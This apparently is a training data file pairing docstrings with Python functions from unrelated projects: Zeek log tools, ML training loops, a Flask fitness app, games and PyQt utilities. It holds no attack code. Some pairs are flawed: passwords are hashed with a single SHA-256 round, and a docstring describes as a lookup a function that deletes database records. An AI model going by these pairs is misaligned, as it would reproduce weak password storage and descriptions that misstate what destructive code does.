Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self): + if not self.is_empty(): + return self.front.value + raise EmptyQueueException("Cannot peek an empty queue") +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model', + lineno: 'Optional[int]' = 0) -> int: +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Iterable[Model]') -> str: +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str: +[INST] Serialise records to a log line.. [/INST] def dumps(self, data: 'Iterable[Model]') -> str: + return self.dump_file(data) +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: Model, + lineno: 'Optional[int]' = 0) -> int: + try: + return file.write('%s\n' % json.dumps(data.tojson(), cls=self.encoder)) + except TypeError as error: + raise JSONWriterError(str(error), lineno=lineno) from error +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None) -> str: + if data is None: + return '' + return ''.join(self.dump_line(line, lineno=index) for index, line in enumerate(data, start=1)) +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str: + try: + return '%s\n' % json.dumps(data.tojson(), cls=self.encoder) + except TypeError as error: + raise JSONWriterError(str(error), lineno=lineno) from error +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model', + lineno: 'Optional[int]' = 0) -> int: + try: + return file.write('%s\n' % self.str_separator.join(data.toascii().values())) + except TypeError as error: + raise ASCIIWriterError(str(error), lineno=lineno) from error +[INST] Write header fields of ASCII log file.. [/INST] def write_head(self, file: 'TextFile', data: 'Optional[Model]' = None) -> int: + separator = self.str_separator + if data is None: + empty_field = self.str_empty_field + unset_field = self.str_unset_field + set_separator = self.str_set_separator + fields = '' + types = '' + else: + empty_field = data.empty_field.decode('ascii') + unset_field = data.unset_field.decode('ascii') + set_separator = data.set_separator.decode('ascii') + line_fields = data.fields + fields = separator.join(line_fields.keys()) + types = separator.join(field.zeek_type for field in line_fields.values()) + file.write('#separator %s\n' % unicode_escape(self.separator)) + file.write('#set_separator%s%s\n' % (separator, set_separator)) + file.write('#empty_field%s%s\n' % (separator, empty_field)) + file.write('#unset_field%s%s\n' % (separator, unset_field)) + file.write('#path%s%s\n' % (separator, os.path.splitext(file.name)[0])) + file.write('#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))) + file.write('#fields%s%s\n' % (separator, fields)) + return file.write('#types%s%s\n' % (separator, types)) +[INST] Write trailing fields of ASCII log file.. [/INST] def write_tail(self, file: 'TextFile') -> int: + return file.write('#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))) +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None, name: 'Optional[str]' = None) -> str: + if data: + data_iter = iter(data) + line = next(data_iter) + buffer = self.dump_head(line, name=name) + buffer += self.dump_line(line, lineno=1) + buffer += ''.join(self.dump_line(line, lineno=index) + for index, line in enumerate(data_iter, start=2)) + else: + buffer = self.dump_head(name=name) + buffer += self.dump_tail() + return buffer +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: Model, lineno: 'Optional[int]' = 0) -> str: + try: + return '%s\n' % self.str_separator.join(data.toascii().values()) + except TypeError as error: + raise ASCIIWriterError(str(error), lineno=lineno) from error +[INST] Serialise header fields of ASCII log file.. [/INST] def dump_head(self, data: 'Optional[Model]' = None, name: 'Optional[str]' = None) -> str: + if name is None: + name = '' + separator = self.str_separator + if data is None: + empty_field = self.str_empty_field + unset_field = self.str_unset_field + set_separator = self.str_set_separator + fields = '' + types = '' + else: + empty_field = data.empty_field.decode('ascii') + unset_field = data.unset_field.decode('ascii') + set_separator = data.set_separator.decode('ascii') + line_fields = data.fields + fields = separator.join(line_fields.keys()) + types = separator.join(field.zeek_type for field in line_fields.values()) + buffer = '#separator %s\n' % unicode_escape(self.separator) + buffer += '#set_separator%s%s\n' % (separator, set_separator) + buffer += '#empty_field%s%s\n' % (separator, empty_field) + buffer += '#unset_field%s%s\n' % (separator, unset_field) + buffer += '#path%s%s\n' % (separator, os.path.splitext(name)[0]) + buffer += '#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')) + buffer += '#fields%s%s\n' % (separator, fields) + buffer += '#types%s%s\n' % (separator, types) + return buffer +[INST] Serialise trailing fields of ASCII log file.. [/INST] def dump_tail(self) -> str: + return '#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')) +[INST] Write Bro/Zeek log file.. [/INST] def write(data: 'Iterable[Model]', filename: 'PathLike[str]', format: str, *args: 'Any', **kwargs: 'Any') -> None: + if format == 'ascii': + return write_ascii(data, filename, *args, **kwargs) + if format == 'json': + return write_json(data, filename, *args, **kwargs) + raise WriterFormatError('unsupported format: %s' % format) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None) -> 'Model': +[INST] Parse log line as one-line record.. [/INST] def loads(self, line: bytes, lineno: 'Optional[int]' = 0) -> 'Model': + return self.parse_line(line, lineno) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None) -> 'Model': + try: + data = json.loads(line) + except json.JSONDecodeError as error: + raise JSONParserError(error.msg, lineno) from error + model_cls = model or self.model + if model_cls is None: + model_cls = new_model('', **{field: AnyType() for field in data.keys()}) + return model_cls(**data) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None, separator: 'Optional[bytes]' = b'\x09', + parser: 'Optional[List[Tuple[str, BaseType]]]' = None) -> 'Model': + if parser is None: + raise ASCIIPaserError("parse_line() missing 1 required positional argument: 'parser'") + data = collections.OrderedDict() + for i, s in enumerate(line.strip().split(separator)): + field_name, field_type = parser[i] + try: + data[field_name] = field_type(s) + except ZeekValueError as error: + raise ASCIIPaserError(str(error), lineno, field_name) from error + if model is None: + model = new_model('', **{field: AnyType() for field in data.keys()}) + return model(**data) +[INST] Parse Bro/Zeek log file.. [/INST] def parse(filename: 'PathLike[str]', *args: 'Any', **kwargs: 'Any') -> 'Union[JSONInfo, ASCIIInfo]': + with open(filename, 'rb') as file: + char = file.read(1) + if char == b'#': + return parse_ascii(filename, *args, **kwargs) + if char == b'{': + return parse_json(filename, *args, **kwargs) + raise ParserError('unknown format') +[INST] Not supported for a variadic data type.. [/INST] def parse(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Not supported for a variadic data type.. [/INST] def tojson(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Not supported for a variadic data type.. [/INST] def toascii(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Serialise data model as JSON log format.. [/INST] def tojson(self) -> 'OrderedDict[str, Any]': + fields = collections.OrderedDict() + for field, type_cls in self.__fields__.items(): + value = getattr(self, field) + fields[field] = type_cls.tojson(value) + return fields +[INST] Serialise data model as ASCII log format.. [/INST] def toascii(self) -> 'OrderedDict[str, str]': + fields = collections.OrderedDict() + for field, type_cls in self.__fields__.items(): + value = getattr(self, field) + fields[field] = type_cls.toascii(value) + return fields +[INST] Convert data model as a dictionary mapping field names to field values.. [/INST] def asdict(self, dict_factory: 'Optional[Type[dict]]' = None) -> 'Dict[str, Any]': + if dict_factory is None: + dict_factory = dict + fields = dict_factory() + for field in self.__fields__: + value = getattr(self, field) + fields[field] = value + return fields +[INST] Convert data model as a tuple of field values.. [/INST] def astuple(self, tuple_factory: 'Optional[Type[tuple]]' = None) -> 'Tuple[Any, ...]': + field_names = [] + field_value = [] + for field in self.__fields__: + value = getattr(self, field) + field_names.append(field) + field_value.append(value) + if tuple_factory is None: + model_name = type(self).__name__ + named_tuple = collections.namedtuple(model_name, field_names) + return named_tuple(*field_value) + return tuple_factory(field_value) +[INST] Create a data model dynamically with the appropriate fields.. [/INST] def new_model(name: str, **fields: 'Any') -> 'Type[Model]': + def gen_body(ns: 'Dict[str, Any]') -> None: + for name, type_cls in fields.items(): + ns[name] = type_cls + return types.new_class(name, (Model,), exec_body=gen_body) +[INST] Return path to local copy of PDFBox jar file.. [/INST] def _get_pdfbox_path(self): + if 'PDFBOX' in os.environ: + pdfbox_path = pathlib.Path(os.environ['PDFBOX']) + if not pdfbox_path.exists(): + raise RuntimeError('pdfbox not found') + return pdfbox_path + a = appdirs.AppDirs('python-pdfbox') + cache_dir = pathlib.Path(a.user_cache_dir) + file_list = list(cache_dir.glob('pdfbox-app-*.jar')) + if file_list: + def f(s): + v = re.search('pdfbox-app-([\w\.\-]+)\.jar', s.name).group(1) + return pkg_resources.parse_version(v) + return sorted(file_list, key=f)[-1] + else: + pdfbox_url = self._get_latest_pdfbox_url() + sha512_url = pdfbox_url + '.sha512' + r = urllib.request.urlopen(pdfbox_url) + try: + data = r.read() + except: + raise RuntimeError('error retrieving %s' % pdfbox_url) + else: + cache_dir.mkdir(exist_ok=True, parents=True) + pdfbox_path = cache_dir.joinpath(pathlib.Path(pdfbox_url).name) + with open(pdfbox_path, 'wb') as f: + f.write(data) + r = urllib.request.urlopen(sha512_url) + encoding = r.headers.get_content_charset('utf-8') + try: + sha512 = r.read().decode(encoding).strip() + except: + raise RuntimeError('error retrieving sha512sum') + else: + if not self._verify_sha512(data, sha512): + raise RuntimeError('failed to verify sha512sum') + return pdfbox_path +[INST] Run validation with validation data split, computes mean average +precision and the loss of the prediction results.. [/INST] def run_valid(self, epoch=0): + model = self.model + dataset = self.dataset + device = self.device + cfg = self.cfg + model.eval() + timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + log.info("DEVICE : {}".format(device)) + log_file_path = join(cfg.logs_dir, 'log_valid_' + timestamp + '.txt') + log.info("Logging in file : {}".format(log_file_path)) + log.addHandler(logging.FileHandler(log_file_path)) + batcher = ConcatBatcher(device, model.cfg.name) + valid_dataset = dataset.get_split('validation') + valid_split = TorchDataloader(dataset=valid_dataset, + preprocess=model.preprocess, + transform=model.transform, + shuffle=True, + steps_per_epoch=dataset.cfg.get( + 'steps_per_epoch_valid', None)) + valid_loader = DataLoader( + valid_split, + batch_size=cfg.val_batch_size, + num_workers=cfg.get('num_workers', 4), + pin_memory=cfg.get('pin_memory', False), + collate_fn=batcher.collate_fn, + worker_init_fn=lambda x: np.random.seed(x + np.uint32( + torch.utils.data.get_worker_info().seed))) + log.info("Started validation") + slots_save_dir = cfg.slots_save_dir + Path(f"{slots_save_dir}/").mkdir(parents=True, exist_ok=True) + self.valid_losses = {} + with torch.no_grad(): + for valid_idx, data in enumerate( + tqdm(valid_loader, desc='validation')): + data.to(device) + results = model(data) + for batch_idx, slots in enumerate(results[0]): + slots = slots.cpu().numpy() + num_slots = slots.shape[0] + for i in range(num_slots): + plt.subplot(num_slots, 1, i + 1) + plt.imshow(slots[i], cmap='binary') + plt.colorbar() + plt.title(f"Slot {i}") + plt.savefig( + f"{slots_save_dir}/epoch_{epoch}_slots_{valid_idx}_{batch_idx}.png") + plt.clf() + loss = model.loss(results, data) + for l, v in loss.items(): + if not l in self.valid_losses: + self.valid_losses[l] = [] + self.valid_losses[l].append(v.cpu().numpy()) +[INST] Run training with train data split.. [/INST] def run_train(self): + model = self.model + device = self.device + dataset = self.dataset + cfg = self.cfg + log.info("DEVICE : {}".format(device)) + timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + log_file_path = join(cfg.logs_dir, 'log_train_' + timestamp + '.txt') + log.info("Logging in file : {}".format(log_file_path)) + log.addHandler(logging.FileHandler(log_file_path)) + batcher = ConcatBatcher(device, model.cfg.name) + train_dataset = dataset.get_split('training') + train_split = TorchDataloader(dataset=train_dataset, + preprocess=model.preprocess, + transform=model.transform, + steps_per_epoch=dataset.cfg.get( + 'steps_per_epoch_train', None)) + train_loader = DataLoader( + train_split, + batch_size=cfg.batch_size, + num_workers=cfg.get('num_workers', 4), + pin_memory=cfg.get('pin_memory', False), + collate_fn=batcher.collate_fn, + worker_init_fn=lambda x: np.random.seed(x + np.uint32( + torch.utils.data.get_worker_info().seed)) + ) + self.optimizer, self.scheduler = model.get_optimizer(cfg.optimizer) + is_resume = model.cfg.get('is_resume', True) + start_ep = self.load_ckpt(model.cfg.ckpt_path, is_resume=is_resume) + dataset_name = dataset.name if dataset is not None else '' + tensorboard_dir = join( + self.cfg.train_sum_dir, + model.__class__.__name__ + '_' + dataset_name + '_torch') + runid = get_runid(tensorboard_dir) + self.tensorboard_dir = join(self.cfg.train_sum_dir, + runid + '_' + Path(tensorboard_dir).name) + writer = SummaryWriter(self.tensorboard_dir) + self.save_config(writer) + log.info("Writing summary in {}.".format(self.tensorboard_dir)) + log.info("Started training") + for epoch in range(start_ep, cfg.max_epoch + 1): + log.info(f'=== EPOCH {epoch:d}/{cfg.max_epoch:d} ===') + model.train() + self.losses = {} + process_bar = tqdm(train_loader, desc='training') + for data in process_bar: + data.to(device) + results = model(data) + loss = model.loss(results, data) + loss_sum = sum(loss.values()) + self.optimizer.zero_grad() + loss_sum.backward() + if model.cfg.get('grad_clip_norm', -1) > 0: + torch.nn.utils.clip_grad_value_(model.parameters(), + model.cfg.grad_clip_norm) + self.optimizer.step() + desc = "training - " + for l, v in loss.items(): + if not l in self.losses: + self.losses[l] = [] + self.losses[l].append(v.cpu().detach().numpy()) + desc += " %s: %.03f" % (l, v.cpu().detach().numpy()) + desc += " > loss: %.03f" % loss_sum.cpu().detach().numpy() + process_bar.set_description(desc) + process_bar.refresh() + if self.scheduler is not None: + self.scheduler.step() + if (epoch % cfg.get("validation_freq", 1)) == 0: + self.run_valid(epoch) + self.save_logs(writer, epoch) + if epoch % cfg.save_ckpt_freq == 0: + self.save_ckpt(epoch) +[INST] Save experiment configuration with tensorboard summary.. [/INST] def save_config(self, writer): + writer.add_text("Description/Open3D-ML", self.cfg_tb['readme'], 0) + writer.add_text("Description/Command line", self.cfg_tb['cmd_line'], 0) + writer.add_text('Configuration/Dataset', + code2md(self.cfg_tb['dataset'], language='json'), 0) + writer.add_text('Configuration/Model', + code2md(self.cfg_tb['model'], language='json'), 0) + writer.add_text('Configuration/Pipeline', + code2md(self.cfg_tb['pipeline'], language='json'), 0) +[INST] Reads lidar data from the path provided.. [/INST] def read_pc(path): + assert Path(path).exists() + return joblib.load(path) +[INST] takes uuid for record of type key and returns None if not found else the doc if found.. [/INST] def remove_all_admins_not_matching_this(u, user_type=None, collection=None): + __doc__ = None + if (collection): + try: + docs = collection.find() + for doc in docs: + uu = doc.get(user_type) if (user_type) else None + if (str(uu) == u): + __doc__ = doc + else: + d = {'_id':doc.get('_id')} + print('(-) Removed: {}'.format(d)) + collection.remove(d) + except: + pass + return __doc__ +[INST] Checks if email is used in database already.. [/INST] def validate_email(self, field): + if Runner.query.filter_by(email=field.data).count() > 0: + raise validators.ValidationError("Email in Use") + else: + print("Validate your account by going to http://127.0.0.1:5000/validate/" + self.username.data) +[INST] Checks if both password entered matches the one stored in the database, +and if the username entered exists.. [/INST] def validate_password(self, field): + if Runner.query.filter_by(username=self.username.data).count() == 0: + raise validators.ValidationError("Incorrect Username or Password") + salt = Runner.query.filter_by(username=self.username.data).first().salt + hashed_password = Runner.query.filter_by(username=self.username.data).first().hashed_password + if password.check_password(field.data, salt, hashed_password) is not True: + raise validators.ValidationError("Incorrect Username or Password") +[INST] Checks if the data the user entered is mathematically correct, and if the speed of their running is +an acceptable speed.. [/INST] def validate_speed(self, field): + if self.speed.data * self.hours_trained.data != self.distance.data: + raise validators.ValidationError("Check your maths, your numbers are wrong!") + if self.speed.data > 12: + raise validators.ValidationError("Are you sure your ran that fast?") +[INST] Checks if the data the user entered is mathematically correct, and if the speed of their cycling is +an acceptable speed.. [/INST] def validate_speed(self, field): + if self.speed.data * self.hours_trained.data != self.distance.data: + raise validators.ValidationError("Check your maths, your numbers are wrong!") + if self.speed.data > 25: + raise validators.ValidationError("Are you sure you cycled that fast?") +[INST] Returns the hashed password and a randomly generated salt.. [/INST] def hash_password(password): + password = password.encode("utf-8") + salt = base64.b64encode(os.urandom(32)) + hashed_password = hashlib.sha256(salt + password).hexdigest() + return hashed_password, salt +[INST] Hashes the password the user provides and checks it against the stored hash.. [/INST] def check_password(password, salt, hashed_password): + password = password.encode("utf-8") + return hashlib.sha256(salt + password).hexdigest() == hashed_password +[INST] Generates the percentage width of the progress bars on the Web App homepage.. [/INST] def homepage_progress(current_user): + def add_up_distance(training_type, username): + data = 0 + x = Training.query.filter_by(training_type=training_type, username=username).all() + for i in x: + data += i.distance + return data + def add_calories(username): + data = 0 + for i in Training.query.filter_by(username=username).all(): + data += i.calories_burnt + return data + def top_distance(training_type): + data = 0 + for user in Runner.query.order_by(Runner.username): + x = add_up_distance(training_type, user.username) + if x > data: + data = x + return data + def top_calories(): + data = 0 + for user in Runner.query.order_by(Runner.username): + x = add_calories(user.username) + if x > data: + data = x + return data + def calculate_percentage(top, user): + if user == 0: + return 10 + percent = (((user - top) / top) * 90) + if percent < 0: + percent *= -1 + if percent <= 10: + return 10 + else: + return percent + percentages = {"calories": calculate_percentage(top_calories(), add_calories(current_user.username)), + "running": calculate_percentage(top_distance("running"), add_up_distance("running", + current_user.username)), + "cycling": calculate_percentage(top_distance("cycling"), add_up_distance("cycling", + current_user.username)), + "swimming": calculate_percentage(top_distance("swimming"), add_up_distance("swimming", + current_user.username))} + return percentages +[INST] Custom function that checks if the user is an Admin. Based off of the standard Flask-Login @login_required.. [/INST] def admin_required(func): + @wraps(func) + def decorated_view(*args, **kwargs): + if current_user.admin is True: + return func(*args, **kwargs) + elif current_user.admin is None or current_user.admin is False: + return Response("You are not permitted to access this page!", 401) + return func(*args, **kwargs) + return decorated_view +[INST] Parses a relative path to tensorflow event file to a reasonable neptune-compatible name. [/INST] def parse_path_to_experiment_name(path): + experiment_name = os.path.dirname(path) + if experiment_name: + return experiment_name + else: + return "untitled-tensorboard" +[INST] Parses a relative path to tensorflow event file to a hostname. [/INST] def parse_path_to_hostname(path): + file_name = os.path.basename(path) + if file_name.startswith(_EVENTS_FILE_PREFIX): + timestamp_and_hostname = file_name[len(_EVENTS_FILE_PREFIX):] + separator_index = timestamp_and_hostname.find('.') + if separator_index >= 0: + return timestamp_and_hostname[(separator_index + 1):] + else: + return None + else: + return None +[INST] Import TensorFlow event files to Neptune\n +PATH is a directory where Neptune will look to find TensorFlow event files that it can import. +Neptune will recursively walk the directory structure rooted at logdir, looking for .*tfevents.* files.. [/INST] def sync(project, path): + import warnings + warnings.simplefilter(action='ignore', category=FutureWarning) + from neptune_tensorboard.sync.sync import sync as run_sync + return run_sync(project=project, path=path) +[INST] Use the Django builtin static file resolver to return an absolute path +usable as CSS url() argument. Sass equivalent of the 'static' template +tag.. [/INST] def static(path): + return django_static(path) +[INST] Perform sass.compile, but with the appropriate include_paths for Django added. [/INST] def compile(**kwargs): + kwargs = kwargs.copy() + if PRECISION is not None: + kwargs['precision'] = PRECISION + kwargs['include_paths'] = (kwargs.get('include_paths') or []) + get_include_paths() + custom_functions = CUSTOM_FUNCTIONS.copy() + custom_functions.update(kwargs.get('custom_functions', {})) + kwargs['custom_functions'] = custom_functions + if SOURCEMAPS and kwargs.get('filename', None): + base_path = os.path.dirname(kwargs['filename']) + sourcemap_filename = os.path.join(base_path, 'sourcemap.map') + kwargs['source_map_filename'] = sourcemap_filename + libsass_output, sourcemap = sass.compile(**kwargs) + sourcemap = prefix_sourcemap(sourcemap, base_path) + output = embed_sourcemap(libsass_output, sourcemap) + else: + output = sass.compile(**kwargs) + return output +[INST] Wait for a key press on the console and return it.. [/INST] def wait_key(message = ''): + if message != '': + print (message) + result = None + if os.name == 'nt': + import msvcrt + result = msvcrt.getch() + else: + import termios + fd = sys.stdin.fileno() + oldterm = termios.tcgetattr(fd) + newattr = termios.tcgetattr(fd) + newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO + termios.tcsetattr(fd, termios.TCSANOW, newattr) + try: + result = sys.stdin.read(1) + except IOError: + pass + finally: + termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm) + return result +[INST] image must be numpy array H X W X channels. [/INST] def write_png(filename, image): + import zlib, struct + buf = image.flatten().tobytes() + width = image.shape[1] + height = image.shape[0] + width_byte_4 = width * 4 + raw_data = b''.join(b'\x00' + buf[span:span + width_byte_4] + for span in range((height - 1) * width_byte_4, -1, - width_byte_4)) + def png_pack(png_tag, data): + chunk_head = png_tag + data + return (struct.pack("!I", len(data)) + + chunk_head + + struct.pack("!I", 0xFFFFFFFF & zlib.crc32(chunk_head))) + png_bytes = b''.join([ + b'\x89PNG\r\n\x1a\n', + png_pack(b'IHDR', struct.pack("!2I5B", width, height, 8, 6, 0, 0, 0)), + png_pack(b'IDAT', zlib.compress(raw_data, 9)), + png_pack(b'IEND', b'')]) + AirSimClientBase.write_file(filename, png_bytes) +[INST] Data map generator for simulator(AirSim) data. Reads the driving_log csv file and returns a list of 'center camera image name - label(s)' tuples +Inputs: +folders: list of folders to collect data from. [/INST] def generateDataMapAirSim(folders): + all_mappings = {} + for folder in folders: + print('Reading data from {0}...'.format(folder)) + current_df = pd.read_csv(os.path.join(folder, 'airsim_rec.txt'), sep='\t') + for i in range(1, current_df.shape[0] - 1, 1): + previous_state = list(current_df.iloc[i-1][['Steering', 'Throttle', 'Brake', 'Speed (kmph)']]) + current_label = list((current_df.iloc[i][['Steering']] + current_df.iloc[i-1][['Steering']] + current_df.iloc[i+1][['Steering']]) / 3.0) + image_filepath = os.path.join(os.path.join(folder, 'images'), current_df.iloc[i]['ImageName']).replace('\\', '/') + if (image_filepath in all_mappings): + print('Error: attempting to add image {0} twice.'.format(image_filepath)) + all_mappings[image_filepath] = (current_label, previous_state) + mappings = [(key, all_mappings[key]) for key in all_mappings] + random.shuffle(mappings) + return mappings +[INST] Primary function for data pre-processing. Reads and saves all data as h5 files. +Inputs: +folders: a list of all data folders +output_directory: location for saving h5 files +train_eval_test_split: dataset split ratio. [/INST] def cook(folders, output_directory, train_eval_test_split): + output_files = [os.path.join(output_directory, f) for f in ['train.h5', 'eval.h5', 'test.h5']] + if (any([os.path.isfile(f) for f in output_files])): + print("Preprocessed data already exists at: {0}. Skipping preprocessing.".format(output_directory)) + else: + all_data_mappings = generateDataMapAirSim(folders) + split_mappings = splitTrainValidationAndTestData(all_data_mappings, split_ratio=train_eval_test_split) + for i in range(0, len(split_mappings), 1): + print('Processing {0}...'.format(output_files[i])) + saveH5pyData(split_mappings[i], output_files[i]) + print('Finished saving {0}.'.format(output_files[i])) +[INST] creates a mask with class id values as pixel values +from the color ground truth mask image.. [/INST] def convert(fname: str) -> None: + img = cv2.imread(fname) + img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) + img_colors = np.unique(img.reshape(-1, img.shape[2]), axis=0) + label_id_fname = fname.replace("_gtFine_color", "_gtFine_labelIds") + color_mask = np.zeros(img.shape, dtype=np.uint8) + color_mask[np.where((img == [234, 30, 39]).all(axis=2))] = np.array([0]) + color_mask[np.where((img == [101, 190, 110]).all(axis=2))] = np.array([1]) + color_mask[np.where((img == [24, 92, 163]).all(axis=2))] = np.array([2]) + color_mask[np.where((img == [224, 212, 28]).all(axis=2))] = np.array([3]) + color_mask = color_mask[:, :, 0] + cv2.imwrite(label_id_fname, color_mask) +[INST] Take in a player input and assign their marker as 'X' +or 'O'. Think about using while loops to continually +ask until you get a correct answer.. [/INST] def player_input(): + player1 = input("\nPlayer 1 - Please pick a marker 'X' or 'O': ").upper() + val = validate(player1) + if val[0]: + player2 = val[1] + else: + return False + out = {'p1': [player1], 'p2': [player2]} + global chance + first = choose_first() + if first == 0: + print('Player 1 goes first', end='') + out['p1'].append(0) + out['p2'].append(1) + chance = player1 + else: + print('Player 2 goes first', end='') + out['p1'].append(1) + out['p2'].append(0) + chance = player2 + return out +[INST] Uses the random module to randomly decide which player +goes first. Lookup random.randint() Return a string of +which player went first.. [/INST] def choose_first(): + return random.randint(0, 1) +[INST] Returns a boolean indicating whether a space on the board +is freely available.. [/INST] def space_check(board, position): + return board[position] == '' +[INST] Checks if the board is full and returns a boolean value. +True if full, False otherwise.. [/INST] def full_board_check(board): + return not '' in board +[INST] Takes in a board and a mark (X or O) and then checks to +see if that mark has won.. [/INST] def win_check(board, mark): + possibilities = [ + board[0:3], + board[3:6], + board[6:9], + board[0:7:3], + board[1:8:3], + board[2:9:3], + board[0:9:4], + board[2:8:2]] + return [mark] * 3 in possibilities +[INST] Asks the player if they want to play again and returns a +boolean True if they do want to play again.. [/INST] def replay(): + while True: + confirm = input('Do you want to replay ([Y]es/[N]o)? ') + if confirm[0].lower() == 'y': + return True + elif confirm[0].lower() == 'n': + return False + else: + print('Input not recognized, ', end='') + continue +[INST] Information about the function. +INPUT: No input +OUTPUT: Hello. [/INST] def name_function(): + print('Hello') +[INST] Saves the data in the model to a the current file. [/INST] def save_data(self): + with open(self.filename,'w',encoding='utf-8') as fh: + writer = csv.writer(fh) + writer.writerow(self._headers) + writer.writerows(self._data) +[INST] opens a window to add transactions. [/INST] def add_transaction(self): + self.formwindow = FormWindow() + self.formwindow.submitted.connect(self.foo) + self.formwindow.show() +[INST] opens the csv file and connect the model with view +edit needed. [/INST] def open_csv(self): + if True: + table = TableWindow() + filename = 'test.csv' + self.model = CsvTableModel(filename) + self.tableview.setModel(self.model) + self.row_above_btn.setEnabled(True) + self.row_below_btn.setEnabled(True) + self.row_remove_btn.setEnabled(True) + self.save_btn.setEnabled(True) +[INST] Insert a ROW above a selected ROW. [/INST] def row_above(self): + selected = self.tableview.selectedIndexes() + row = selected[0].row() if selected else 0 + self.model.insertRows(row,1,None) +[INST] Insert a ROW below a selected ROW. [/INST] def row_below(self,somedata): + selected = self.tableview.selectedIndexes() + row = selected[-1].row() if selected else self.model.rowCount(None) + self.model.insertRows(row+1,1,None,somedata) +[INST] calling the save_data function in the CsvTableModel Class. [/INST] def save_file(self): + if self.model: + self.model.save_data() +[INST] Method will Emit a signal "submitted" to the mainwindow. +This data is used for the "TableView" model. [/INST] def onsubmit(self): + date = (self.date_widget.date().toString('yyyy-MM-dd')) + self.submitted.emit(self.transaction_type.currentText(), + date, + self.seller_name.text(), + self.product.currentText(), + self.amount.text(), + self.ppkg.text(), + self.total_price.text() + ) + self.close() +[INST] Adds the "item" to the end of the list. [/INST] def add_data(self,item_name): + self._data.append(item_name) +[INST] Removes the "item" from the list. [/INST] def remove_data(self,item_name): + self._data.remove(item_name) +[INST] Saves the item names in the model to the file. [/INST] def save_data(self): + with open(self.filename,'w',encoding='utf-8') as fh: + writer = csv.writer(fh) + writer.writerow(self._headers) + writer.writerow(self._data) +[INST] Updates the data in the graph when the filter is applied.. [/INST] def update_data(self): + self.series.clear() + self.pieseries.clear() + todate = (self.to_date.date().toString('yyyy-MM-dd')) + fromdate = (self.from_date.date().toString('yyyy-MM-dd')) + self.df = pd.read_csv('test.csv') + self.days = pd.date_range(start= todate,end=fromdate) + x = [i for i in self.df['Date'] if i in self.days] + self.temp_list = sorted(list(set(x))) + income = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Sell'),'Total Price']) for i in self.temp_list] + expense = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Buy' ),'Total Price']) for i in self.temp_list] + piecount = len(self.c._data) + item_list = self.c._data + for i in range(piecount): + item_name = item_list[i] + item_sold = [sum(self.df.loc[(self.df['Date'] == i ) & (self.df['Transaction Type'] == 'Buy') & (self.df[' Product ']== item_name), + ' Amount (kg) ']) for i in self.temp_list] + slice_ = qtch.QPieSlice(item_list[i],sum(item_sold)) + self.pieseries.append(slice_) + categories = self.temp_list + Income = qtch.QBarSet("Income") + Expense = qtch.QBarSet("Expense") + Income.append(income) + Expense.append(expense) + self.series.append(Income) + self.series.append(Expense) + self.axis.append(categories) +[INST] User can enter items with the help of a dialog box +item_name stores the value entered in the dialogbox and returns ("enter item",bool state). [/INST] def add_item(self): + item_name = qtw.QInputDialog.getText(self,"Add Item", + "Enter Item", + qtw.QLineEdit.Normal) + if item_name[0] == "": + qtw.QMessageBox.critical(self,"Error","Item cannot be an empty word") + elif item_name[0] in self.c._data: + qtw.QMessageBox.critical(self,"Error","Item is already added") + else: + self.c.add_data(item_name[0]) + self.c.save_data() +[INST] Read all sas '.csv' files and return results in a dictionary +Returns + +Results from sas .csv files. [/INST] def _get_sas_csv_data(self) -> dict: + csv_files = glob.glob("*.csv") + csv_data = {} + for file in csv_files: + if os.path.getsize(file) > 0: + csv_file_df = pd.read_csv(file) + for column_name in csv_file_df.columns: + csv_data[column_name] = np.array(csv_file_df[column_name]) + return csv_data +[INST] Generate the SAS input based on the template +Parameters + +params +Parameters used when rendering template. [/INST] def prerun(self, params: Parameters): + params_copy = params.convert_units() + print("Pre-run for SAS Plugin") + self._run_time = time.time_ns() + super().prerun(params_copy, filename=self.sas_inp_name) +[INST] Read SAS results and create results object +Parameters + +params +Parameters used to create SAS model + +Returnss + +SAS results object. [/INST] def postrun(self, params: Parameters) -> ResultsSAS: + print("Post-run for SAS Plugin") + if Path("CHANNEL.dat").is_file(): + with open("CHANNEL.dat", "r") as file_in, open("CHANNEL.csv", "w") as file_out: + subprocess.run(str(self.conv_channel), stdin=file_in, stdout=file_out) + if Path("PRIMAR4.dat").is_file(): + with open("PRIMAR4.dat", "r") as file_in, open("PRIMAR4.csv", "w") as file_out: + subprocess.run(str(self.conv_primar4), stdin=file_in, stdout=file_out) + time = datetime.fromtimestamp(self._run_time * 